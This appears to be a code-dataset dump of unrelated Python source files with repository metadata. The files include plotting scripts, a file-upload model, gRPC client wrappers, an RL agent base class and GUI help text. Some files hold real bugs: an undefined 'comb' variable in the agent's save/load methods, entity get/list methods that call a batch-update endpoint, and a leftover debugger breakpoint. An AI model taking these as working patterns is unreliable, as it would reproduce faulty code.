| 21.866667 | 77 | 0.72561 | 88 | 656 | 5.363636 | 0.670455 | 0.067797 | 0.076271 | 0.127119 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007449 | 0.181402 | 656 | 29 | 78 | 22.62069 | 0.871508 | 0.810976 | 0 | 0 | 0 | 0 | 0.100917 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.25 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
37fec28a3d8a1de4a4909b8b2901bbd437972313 | 2,436 | py | Python | polyps/connected_components_histogram.py | aangelopoulos/rcps | b400457f7cc7261d1ed610cdf7aa2230de657c57 | [
"MIT"
] | 52 | 2021-01-08T13:10:46.000Z | 2022-03-28T16:15:16.000Z | polyps/connected_components_histogram.py | aangelopoulos/rcps | b400457f7cc7261d1ed610cdf7aa2230de657c57 | [
"MIT"
] | null | null | null | polyps/connected_components_histogram.py | aangelopoulos/rcps | b400457f7cc7261d1ed610cdf7aa2230de657c57 | [
"MIT"
] | 2 | 2021-05-07T04:53:12.000Z | 2021-11-29T00:40:14.000Z | import torch
import torch.nn.functional as F
import numpy as np
import os, argparse
import imageio as io
import matplotlib.pyplot as plt
import pandas as pd
from polyp_utils import *
from PraNet.lib.PraNet_Res2Net import PraNet
from PraNet.utils.dataloader import test_dataset
import pathlib
import random
from scipy.stats import norm
from skimage.transform import resize
import seaborn as sns
from tqdm import tqdm
import pdb
# TODO: All of this is very preliminary code for the CLT only. Will need to expand (see imagenet)
def plot_histogram(num_components, output_dir):
plt.hist(num_components, alpha=0.7, density=True)
ax = plt.gca()
sns.despine(top=True, right=True, ax=ax)
plt.tight_layout()
plt.savefig( output_dir + 'num_connected_components_histogram.pdf' )
def plot_examples(img_names, sigmoids, masks, num_components, desired_num_components, num_images):
fig, axs = plt.subplots(nrows = 3*len(desired_num_components), ncols = num_images, figsize = (num_images * 10, 10*(3*len(desired_num_components))))
for i in range(num_images):
for r in range(len(desired_num_components)):
pdb.set_trace()
filtered_names = img_names[num_components == desired_num_components[r]]
filtered_sigmoids = sigmoids[num_components == desired_num_components[r]]
filtered_masks = masks[num_components == desired_num_components[r]]
if filtered_masks.shape[0] <= i:
continue
axs[3*r,i].axis('off')
axs[3*r,i].imshow(io.imread(filtered_names[i]), aspect='equal')
axs[3*r+1,i].axis('off')
axs[3*r+1,i].imshow(find_peaks(filtered_sigmoids[i]), aspect='equal')
axs[3*r+2,i].axis('off')
axs[3*r+2,i].imshow(filtered_masks[i], aspect='equal')
plt.tight_layout()
plt.savefig(f'outputs/grid_fig/{desired_num_components}_conn_comp_grid_fig.pdf')
if __name__ == '__main__':
sns.set(palette='pastel', font='serif')
sns.set_style('white')
fix_randomness()
cache_path = './.cache/'
output_dir = 'outputs/histograms/'
pathlib.Path(cache_path).mkdir(parents=True, exist_ok=True)
pathlib.Path(output_dir).mkdir(parents=True, exist_ok=True)
img_names, sigmoids, masks, regions, num_components = get_data(cache_path)
plot_histogram(num_components, output_dir)
plot_examples(img_names, sigmoids, masks, num_components, (1,2,3), 5)
| 41.288136 | 152 | 0.708128 | 360 | 2,436 | 4.569444 | 0.388889 | 0.134347 | 0.097264 | 0.055927 | 0.32462 | 0.262614 | 0.106991 | 0.055927 | 0 | 0 | 0 | 0.01197 | 0.176929 | 2,436 | 58 | 153 | 42 | 0.808479 | 0.039409 | 0 | 0.038462 | 0 | 0 | 0.076133 | 0.043627 | 0 | 0 | 0 | 0.017241 | 0 | 1 | 0.038462 | false | 0 | 0.326923 | 0 | 0.365385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
5306d223fe4ac3866d53ddff2cdf000a8fabc8a3 | 4,568 | py | Python | portality/models/uploads.py | glauberm/doaj | dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7 | [
"Apache-2.0"
] | null | null | null | portality/models/uploads.py | glauberm/doaj | dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7 | [
"Apache-2.0"
] | null | null | null | portality/models/uploads.py | glauberm/doaj | dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7 | [
"Apache-2.0"
] | null | null | null | from portality.dao import DomainObject
from datetime import datetime
from copy import deepcopy
class FileUpload(DomainObject):
__type__ = "upload"
@property
def status(self):
return self.data.get("status")
@property
def local_filename(self):
return self.id + ".xml"
@property
def filename(self):
return self.data.get("filename")
@property
def schema(self):
return self.data.get("schema")
@property
def owner(self):
return self.data.get("owner")
@property
def imported(self):
return self.data.get("imported", 0)
@property
def failed_imports(self):
return self.data.get("failed", 0)
@property
def updates(self):
return self.data.get("update", 0)
@property
def new(self):
return self.data.get("new", 0)
@property
def error(self):
return self.data.get("error")
@property
def error_details(self):
return self.data.get("error_details")
@property
def failure_reasons(self):
return self.data.get("failure_reasons", {})
@property
def created_timestamp(self):
if "created_date" not in self.data:
return None
return datetime.strptime(self.data["created_date"], "%Y-%m-%dT%H:%M:%SZ")
def set_schema(self, s):
self.data["schema"] = s
def upload(self, owner, filename, status="incoming"):
self.data["filename"] = filename
self.data["owner"] = owner
self.data["status"] = status
def failed(self, message, details=None):
self.data["status"] = "failed"
self.data["error"] = message
if details is not None:
self.data["error_details"] = details
def validated(self, schema):
self.data["status"] = "validated"
self.data["schema"] = schema
def processed(self, count, update, new):
self.data["status"] = "processed"
self.data["imported"] = count
self.data["update"] = update
self.data["new"] = new
def partial(self, success, fail, update, new):
self.data["status"] = "partial"
self.data["imported"] = success
self.data["failed"] = fail
self.data["update"] = update
self.data["new"] = new
def set_failure_reasons(self, shared, unowned, unmatched):
self.data["failure_reasons"] = {}
if shared is not None and len(shared) > 0:
self.data["failure_reasons"]["shared"] = shared
if unowned is not None and len(unowned) > 0:
self.data["failure_reasons"]["unowned"] = unowned
if unmatched is not None and len(unmatched) > 0:
self.data["failure_reasons"]["unmatched"] = unmatched
def exists(self):
self.data["status"] = "exists"
def downloaded(self):
self.data["status"] = "downloaded"
@classmethod
def list_valid(self):
q = ValidFileQuery()
return self.iterate(q=q.query(), page_size=10000)
@classmethod
def list_remote(self):
q = ExistsFileQuery()
return self.iterate(q=q.query(), page_size=10000)
@classmethod
def by_owner(self, owner, size=10):
q = OwnerFileQuery(owner)
res = self.query(q=q.query())
rs = [FileUpload(**r.get("_source")) for r in res.get("hits", {}).get("hits", [])]
return rs
class ValidFileQuery(object):
base_query = {
"query" : {
"term" : { "status.exact" : "validated" }
},
"sort" : [
{"created_date" : "asc"}
]
}
def __init__(self):
self._query = deepcopy(self.base_query)
def query(self):
return self._query
class ExistsFileQuery(object):
base_query = {
"query" : {
"term" : { "status.exact" : "exists" }
},
"sort" : [
{"created_date" : "asc"}
]
}
def __init__(self):
self._query = deepcopy(self.base_query)
def query(self):
return self._query
class OwnerFileQuery(object):
base_query = {
"query" : {
"bool" : {
"must" : []
}
},
"sort" : [
{"created_date" : "desc"}
],
"size" : 10
}
def __init__(self, owner, size=10):
self._query = deepcopy(self.base_query)
owner_term = {"match" : {"owner" : owner}}
self._query["query"]["bool"]["must"].append(owner_term)
self._query["size"] = size
def query(self):
return self._query
| 26.102857 | 90 | 0.563485 | 517 | 4,568 | 4.866538 | 0.193424 | 0.117647 | 0.083466 | 0.078696 | 0.352146 | 0.213434 | 0.170111 | 0.142289 | 0.142289 | 0.112878 | 0 | 0.007132 | 0.294002 | 4,568 | 174 | 91 | 26.252874 | 0.773023 | 0 | 0 | 0.309859 | 0 | 0 | 0.124562 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.21831 | false | 0 | 0.056338 | 0.105634 | 0.471831 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
530c4df647a13365c8f0227162e8cc89f9712855 | 628 | py | Python | sandbox/decorator_def.py | olileger/sBeull | 41d573285df0b128073784ffefe94cd14c51683d | [
"MIT"
] | null | null | null | sandbox/decorator_def.py | olileger/sBeull | 41d573285df0b128073784ffefe94cd14c51683d | [
"MIT"
] | null | null | null | sandbox/decorator_def.py | olileger/sBeull | 41d573285df0b128073784ffefe94cd14c51683d | [
"MIT"
] | null | null | null | import functools
def FuncDecoratorOne(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
print("Calling: ", func.__name__)
return func(*args, **kwargs)
return wrapper
def FuncDecoratorListProperties(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
print("Object's properties: ", args[0].__dict__)
return func(*args, **kwargs)
return wrapper
def ClassDecoratorOne(c):
__init__ = c.__init__
@functools.wraps(c.__init__)
def wrapper(_self_, *args, **kwargs):
__init__(_self_, *args, **kwargs)
c.__init__ = wrapper
return c | 25.12 | 56 | 0.648089 | 69 | 628 | 5.434783 | 0.333333 | 0.16 | 0.096 | 0.117333 | 0.442667 | 0.442667 | 0.442667 | 0.250667 | 0.250667 | 0 | 0 | 0.002037 | 0.218153 | 628 | 25 | 57 | 25.12 | 0.761711 | 0 | 0 | 0.4 | 0 | 0 | 0.047695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.05 | 0 | 0.6 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
53127463f07bb2f8aec8cb1df1a287f7d5bd6f21 | 198 | py | Python | src/python/txtai/__init__.py | techthiyanes/txtai | 8fcab0699aed5ee8058aa407e38286e7e2abfb13 | [
"Apache-2.0"
] | null | null | null | src/python/txtai/__init__.py | techthiyanes/txtai | 8fcab0699aed5ee8058aa407e38286e7e2abfb13 | [
"Apache-2.0"
] | null | null | null | src/python/txtai/__init__.py | techthiyanes/txtai | 8fcab0699aed5ee8058aa407e38286e7e2abfb13 | [
"Apache-2.0"
] | null | null | null | """
Version string
"""
import logging
# Set default logging format
logging.basicConfig(format="%(asctime)s [%(levelname)s] %(funcName)s: %(message)s")
# Current version tag
__version__ = "4.5.0"
| 16.5 | 83 | 0.70202 | 26 | 198 | 5.192308 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017341 | 0.126263 | 198 | 11 | 84 | 18 | 0.763006 | 0.313131 | 0 | 0 | 0 | 0 | 0.456693 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
53190952988c51863b52803652f2d1243d99e6c7 | 199 | py | Python | src/cheesyutils/__init__.py | Mineinjava/cheesyutils | 49b2c95f4a1b6aecbd3781326e2b3ff7b5829fe3 | [
"MIT"
] | null | null | null | src/cheesyutils/__init__.py | Mineinjava/cheesyutils | 49b2c95f4a1b6aecbd3781326e2b3ff7b5829fe3 | [
"MIT"
] | null | null | null | src/cheesyutils/__init__.py | Mineinjava/cheesyutils | 49b2c95f4a1b6aecbd3781326e2b3ff7b5829fe3 | [
"MIT"
] | null | null | null | """
cheesyutils - A number of utility packages and functions
"""
__title__ = "cheesyutils"
__author__ = "CheesyGamer77"
__copyright__ = "Copyright 2021-present CheesyGamer77"
__version__ = "0.0.30"
| 22.111111 | 56 | 0.758794 | 21 | 199 | 6.428571 | 0.809524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069364 | 0.130653 | 199 | 8 | 57 | 24.875 | 0.710983 | 0.281407 | 0 | 0 | 0 | 0 | 0.488889 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
532cf925096abcaa0148944dc57a952355c7f148 | 4,162 | py | Python | gui/descriptions.py | vault-the/sorter | aa5ed284a6fd1dabc2e3a4447f41db0d83163bfd | [
"BSD-3-Clause"
] | 37 | 2017-04-12T12:34:49.000Z | 2022-03-29T04:39:51.000Z | gui/descriptions.py | vault-the/sorter | aa5ed284a6fd1dabc2e3a4447f41db0d83163bfd | [
"BSD-3-Clause"
] | 2 | 2017-05-03T08:29:34.000Z | 2017-06-16T07:56:18.000Z | gui/descriptions.py | vault-the/sorter | aa5ed284a6fd1dabc2e3a4447f41db0d83163bfd | [
"BSD-3-Clause"
] | 11 | 2017-05-01T19:19:07.000Z | 2021-04-01T04:31:07.000Z | SHORT_DESCRIPTION = "Sorter organises/sorts files using a customised search function to group those that have similar characteristics into a single folder. Similar characteristics include file type, file name or part of the name and file category. You can put all letters documents into one folder, all images with the word home into another, all music by one artist in yet another folder, etc."
SOURCE_DESCRIPTION = "SOURCE (required)\nThis is the folder in which the sorting should be done i.e the folder containing the disorganised files."
DESTINATION_DESCRIPTION = "DESTINATION (optional)\nAn optional destination (a folder) where the user would want the sorted files/folders to be moved to."
RECURSIVE_DESCRIPTION = "LOOK INTO SUB-FOLDERS (optional)\nChecks into every child folder, starting from the source folder, and groups/sorts the files accordingly."
TYPES_DESCRIPTION = "SELECT FILE TYPES (optional)\nSelect the specific file types/formats to be sorted."
SEARCH_DESCRIPTION = "SEARCH FOR (optional)\nDirects Sorter to search and only group files with names containing this value. If this is enabled then, by default, Sort Folders option is enabled to enable the sorted files to be moved to a folder whose name will be the value provided here. The search is case-insensitive but the final folder will adopt the case styles."
GROUP_FOLDER_DESCRIPTION = "GROUP INTO FOLDER (optional)\nMoves all files (and folders) fitting the search descriptions into a folder named by the value provided in this option."
BY_EXTENSION_DESCRIPTION = "GROUP BY FILE TYPE (optional)\nGroups files in the destination and according to their file type. That is, all JPGs different from PDFs different from DOCXs."
CLEANUP_DESCRIPTION = "PERFORM CLEANUP (optional)\nLooks into the child folders of the source folder and removes those which are empty."
NOTE = "Note:\nIf you want a folder and its contents to be left as is (i.e. not to be sorted or affected in any way), just add a file named `.signore` (no extension) into the folder."
HELP_MESSAGE = "How it Works \n" + SHORT_DESCRIPTION + "\n\nBelow is a description of the fields required to achieve results using Sorter:\n\n" + SOURCE_DESCRIPTION + "\n\n" + DESTINATION_DESCRIPTION + \
"\n\n" + SEARCH_DESCRIPTION + "\n\n" + RECURSIVE_DESCRIPTION + \
"\n\n" + TYPES_DESCRIPTION + "\n\n" + \
GROUP_FOLDER_DESCRIPTION + "\n\n" + BY_EXTENSION_DESCRIPTION + "\n\n" + CLEANUP_DESCRIPTION + \
"\n\n" + NOTE
COPYRIGHT_MESSAGE = "Copyright \u00a9 2017\n\nAswa Paul\nAll rights reserved.\n\n"
HOMEPAGE = "https://giantas.github.io/sorter"
SOURCE_CODE = "https://github.com/giantas/sorter"
LICENSE = """BSD 3-Clause License
Copyright (c) 2017, Aswa Paul
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
| 84.938776 | 395 | 0.787122 | 635 | 4,162 | 5.119685 | 0.406299 | 0.006152 | 0.03199 | 0.006767 | 0.056598 | 0.041833 | 0.041833 | 0.041833 | 0.041833 | 0.041833 | 0 | 0.003408 | 0.154012 | 4,162 | 48 | 396 | 86.708333 | 0.919909 | 0 | 0 | 0 | 0 | 0.214286 | 0.851514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
5330d2e4e5607ceb102bed9dc4746159b7edcdc0 | 4,206 | py | Python | ondewo/nlu/services/entity_types.py | foldvaridominic/ondewo-nlu-client-python | a4e766252fc2fdd2372860755082480b4234609a | [
"Apache-2.0"
] | null | null | null | ondewo/nlu/services/entity_types.py | foldvaridominic/ondewo-nlu-client-python | a4e766252fc2fdd2372860755082480b4234609a | [
"Apache-2.0"
] | 5 | 2021-11-23T09:43:28.000Z | 2021-12-17T15:09:06.000Z | ondewo/nlu/services/entity_types.py | foldvaridominic/ondewo-nlu-client-python | a4e766252fc2fdd2372860755082480b4234609a | [
"Apache-2.0"
] | 1 | 2022-02-22T08:54:57.000Z | 2022-02-22T08:54:57.000Z | # Copyright 2021 ONDEWO GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from google.longrunning.operations_pb2 import Operation
from google.protobuf.empty_pb2 import Empty
from ondewo.nlu.core.services_interface import ServicesInterface
from ondewo.nlu.entity_type_pb2 import (
BatchCreateEntitiesRequest,
BatchDeleteEntitiesRequest,
BatchDeleteEntityTypesRequest,
BatchUpdateEntitiesRequest,
BatchUpdateEntityTypesRequest,
CreateEntityTypeRequest,
DeleteEntityTypeRequest,
EntityType,
GetEntityTypeRequest,
ListEntityTypesRequest,
ListEntityTypesResponse,
UpdateEntityTypeRequest, BatchDeleteEntitiesResponse, BatchEntitiesResponse, BatchGetEntitiesRequest,
ListEntitiesRequest, ListEntitiesResponse,
)
from ondewo.nlu.entity_type_pb2_grpc import EntityTypesStub
class EntityTypes(ServicesInterface):
"""
Exposes the entity=type-related endpoints of ONDEWO NLU services in a user-friendly way.
See entity_type.proto.
"""
@property
def stub(self) -> EntityTypesStub:
stub: EntityTypesStub = EntityTypesStub(channel=self.grpc_channel)
return stub
def list_entity_types(self, request: ListEntityTypesRequest) -> ListEntityTypesResponse:
response: ListEntityTypesResponse = self.stub.ListEntityTypes(request, metadata=self.metadata)
return response
def get_entity_type(self, request: GetEntityTypeRequest) -> EntityType:
response: EntityType = self.stub.GetEntityType(request, metadata=self.metadata)
return response
def create_entity_type(self, request: CreateEntityTypeRequest) -> EntityType:
response: EntityType = self.stub.CreateEntityType(request, metadata=self.metadata)
return response
def update_entity_type(self, request: UpdateEntityTypeRequest) -> EntityType:
response: EntityType = self.stub.UpdateEntityType(request, metadata=self.metadata)
return response
def delete_entity_type(self, request: DeleteEntityTypeRequest) -> Empty:
response: Empty = self.stub.DeleteEntityType(request, metadata=self.metadata)
return response
def batch_update_entity_types(self, request: BatchUpdateEntityTypesRequest) -> Operation:
response: Operation = self.stub.BatchUpdateEntityTypes(request, metadata=self.metadata)
return response
def batch_delete_entity_types(self, request: BatchDeleteEntityTypesRequest) -> Operation:
response: Operation = self.stub.BatchDeleteEntityTypes(request, metadata=self.metadata)
return response
def batch_create_entities(self, request: BatchCreateEntitiesRequest) -> BatchEntitiesResponse:
response: BatchEntitiesResponse = self.stub.BatchCreateEntities(request, metadata=self.metadata)
return response
def batch_update_entities(self, request: BatchUpdateEntitiesRequest) -> BatchEntitiesResponse:
response: BatchEntitiesResponse = self.stub.BatchUpdateEntities(request, metadata=self.metadata)
return response
def batch_get_entities(self, request: BatchGetEntitiesRequest) -> BatchEntitiesResponse:
response: BatchEntitiesResponse = self.stub.BatchUpdateEntities(request, metadata=self.metadata)
return response
def batch_delete_entities(self, request: BatchDeleteEntitiesRequest) -> BatchDeleteEntitiesResponse:
response: BatchDeleteEntitiesResponse = self.stub.BatchDeleteEntities(request, metadata=self.metadata)
return response
def list_entities(self, request: ListEntitiesRequest) -> ListEntitiesResponse:
response: ListEntitiesResponse = self.stub.BatchUpdateEntities(request, metadata=self.metadata)
return response
| 43.360825 | 110 | 0.771992 | 410 | 4,206 | 7.834146 | 0.326829 | 0.041096 | 0.070984 | 0.100872 | 0.325654 | 0.252802 | 0.236613 | 0.16812 | 0.152864 | 0.078456 | 0 | 0.003397 | 0.16001 | 4,206 | 96 | 111 | 43.8125 | 0.905746 | 0.157394 | 0 | 0.233333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.216667 | false | 0 | 0.083333 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
5333d273552f348afd8e96dd02ae9877a8fb3e72 | 460 | py | Python | nefertari/authentication/__init__.py | nikitagromov/nefertari | 1e3829bba4008a8014a3a5f23521a082bfd06ecd | [
"Apache-2.0"
] | 34 | 2015-03-27T16:00:38.000Z | 2016-01-26T02:15:47.000Z | nefertari/authentication/__init__.py | nikitagromov/nefertari | 1e3829bba4008a8014a3a5f23521a082bfd06ecd | [
"Apache-2.0"
] | 17 | 2016-01-29T09:29:23.000Z | 2020-03-29T19:24:04.000Z | nefertari/authentication/__init__.py | nikitagromov/nefertari | 1e3829bba4008a8014a3a5f23521a082bfd06ecd | [
"Apache-2.0"
] | 10 | 2016-02-19T08:35:14.000Z | 2020-03-29T11:37:02.000Z | def includeme(config):
""" Set up event subscribers. """
from .models import (
AuthUserMixin,
random_uuid,
lower_strip,
encrypt_password,
)
add_proc = config.add_field_processors
add_proc(
[random_uuid, lower_strip],
model=AuthUserMixin, field='username')
add_proc([lower_strip], model=AuthUserMixin, field='email')
add_proc([encrypt_password], model=AuthUserMixin, field='password')
| 30.666667 | 71 | 0.658696 | 49 | 460 | 5.918367 | 0.489796 | 0.096552 | 0.237931 | 0.137931 | 0.227586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.232609 | 460 | 14 | 72 | 32.857143 | 0.82153 | 0.054348 | 0 | 0 | 0 | 0 | 0.04918 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0.153846 | 0.076923 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
5349cf7c5f6cad078a8fe8575862067acb6265ff | 2,797 | py | Python | rlib/algorithms/base.py | MarcioPorto/rlib | 5919f2dc52105000a23a25c31bbac260ca63565f | [
"MIT"
] | 1 | 2019-09-08T08:33:13.000Z | 2019-09-08T08:33:13.000Z | rlib/algorithms/base.py | MarcioPorto/rlib | 5919f2dc52105000a23a25c31bbac260ca63565f | [
"MIT"
] | 26 | 2019-03-15T03:11:21.000Z | 2022-03-11T23:42:46.000Z | rlib/algorithms/base.py | MarcioPorto/rlib | 5919f2dc52105000a23a25c31bbac260ca63565f | [
"MIT"
] | null | null | null | import os
from abc import ABC, abstractmethod
import torch
class Agent(ABC):
"""Default Agent implementation.
All other agents must inherit this class.
"""
REQUIRED_HYPERPARAMETERS = {}
ALGORITHM = None
def __init__(self, *args, **kwargs):
"""Shared Agent initialization."""
if "new_hyperparameters" in kwargs:
if isinstance(kwargs["new_hyperparameters"], dict):
self._set_hyperparameters(kwargs["new_hyperparameters"])
# Converts each hyperparameter into an attribute
# This minimizes the code written to use the hyperparameters
for key, value in self.REQUIRED_HYPERPARAMETERS.items():
setattr(self, key.upper(), value)
@abstractmethod
def origin(self):
pass
@abstractmethod
def description(self):
pass
def reset(self):
"""Resets noise."""
if hasattr(self, "noise"):
self.noise.reset()
def act(self, state, add_noise=False, logger=None):
"""Default `act` implementation."""
pass
def step(self, state, action, reward, next_state, done, logger=None):
"""Default `step` implementation."""
pass
def learn(self, experiences, logger=None):
"""Default `learn` implementation."""
pass
def update(self, rewards, logger=None):
"""Default `update` implementation."""
pass
def get_hyperparameters(self):
"""Returns the current state of the required hyperparameters.
Returns:
A dictionary of hyperparameters.
"""
return self.REQUIRED_HYPERPARAMETERS
def _set_hyperparameters(self, new_hyperparameters):
"""Adds user defined hyperparameter values to the list required hyperparameters.
Args:
new_hyperparameters: A dictionary containing the new hyperparameter values.
"""
for key, value in new_hyperparameters.items():
if key in self.REQUIRED_HYPERPARAMETERS.keys():
self.REQUIRED_HYPERPARAMETERS[key] = value
def save_state_dicts(self):
"""Save state dicts to file."""
if not self.model_output_dir:
return
for sd in self.state_dicts:
torch.save(
comb[0].state_dict(),
os.path.join(self.model_output_dir, "{}.pth".format(sd[1]))
)
def load_state_dicts(self):
"""Load state dicts from file."""
if not self.model_output_dir:
raise Exception("You must provide an input directory to load state dict.")
for sd in self.state_dicts:
comb[0].load_state_dict(
torch.load(os.path.join(self.model_output_dir, "{}.pth".format(sd[1])))
)
| 29.755319 | 88 | 0.610297 | 307 | 2,797 | 5.433225 | 0.351792 | 0.096523 | 0.064748 | 0.043165 | 0.105516 | 0.105516 | 0.080336 | 0.047962 | 0.047962 | 0.047962 | 0 | 0.002012 | 0.289238 | 2,797 | 93 | 89 | 30.075269 | 0.837022 | 0.240615 | 0 | 0.24 | 0 | 0 | 0.064629 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.24 | false | 0.12 | 0.06 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
5364d39c3e0e891a83a6bc6736093798bb52c498 | 7,292 | py | Python | flytekit/models/interface.py | slai/flytekit | 9d73d096b748d263a638e6865d15db4880845305 | [
"Apache-2.0"
] | null | null | null | flytekit/models/interface.py | slai/flytekit | 9d73d096b748d263a638e6865d15db4880845305 | [
"Apache-2.0"
] | 2 | 2021-06-26T04:32:43.000Z | 2021-07-14T04:47:52.000Z | flytekit/models/interface.py | slai/flytekit | 9d73d096b748d263a638e6865d15db4880845305 | [
"Apache-2.0"
] | null | null | null | import typing
import six as _six
from flyteidl.core import interface_pb2 as _interface_pb2
from flytekit.models import common as _common
from flytekit.models import literals as _literals
from flytekit.models import types as _types
class Variable(_common.FlyteIdlEntity):
def __init__(self, type, description):
"""
:param flytekit.models.types.LiteralType type: This describes the type of value that must be provided to
satisfy this variable.
:param Text description: This is a help string that can provide context for what this variable means in relation
to a task or workflow.
"""
self._type = type
self._description = description
@property
def type(self):
"""
This describes the type of value that must be provided to satisfy this variable.
:rtype: flytekit.models.types.LiteralType
"""
return self._type
@property
def description(self):
"""
This is a help string that can provide context for what this variable means in relation to a task or workflow.
:rtype: Text
"""
return self._description
def to_flyte_idl(self):
"""
:rtype: flyteidl.core.interface_pb2.Variable
"""
return _interface_pb2.Variable(type=self.type.to_flyte_idl(), description=self.description)
@classmethod
def from_flyte_idl(cls, variable_proto):
"""
